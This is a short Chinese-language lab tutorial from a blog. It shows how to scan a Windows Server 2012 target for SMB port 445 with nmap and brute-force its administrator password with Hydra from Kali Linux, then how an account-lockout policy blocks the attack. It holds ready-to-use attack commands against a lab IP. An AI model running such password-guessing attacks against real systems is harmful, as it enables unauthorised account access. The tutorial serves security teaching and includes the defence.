十八、windows系统安全---利用Hydra获得账号密码

环境

靶机:windows server 2012

攻击机:kali linux

靶机环境

  • 密码为弱口令
  • 设定登录失败的次数 锁定用户账号,关闭密码复杂度

image-20211229173358718

image-20211229173446807

步骤

1.在kali上探测目标主机(可在目标主机通过ipconfig查看目标主机IP)是否开启445端口

nmap 192.168.99.105 -p 445

image-20211130212747107

2.使用hydra对已知的administrator账号进行爆破(注意pass.txt的路径)

hydra -l administrator -P pass.txt smb://192.168.99.105

image-20211130212614736

3.暴力破解防御措施 – 设定登录失败的次数 锁定用户账号

image-20211130212845198

继续爆破,账号被锁定不能登录

image-20211130212912166

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

midsummer_woo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值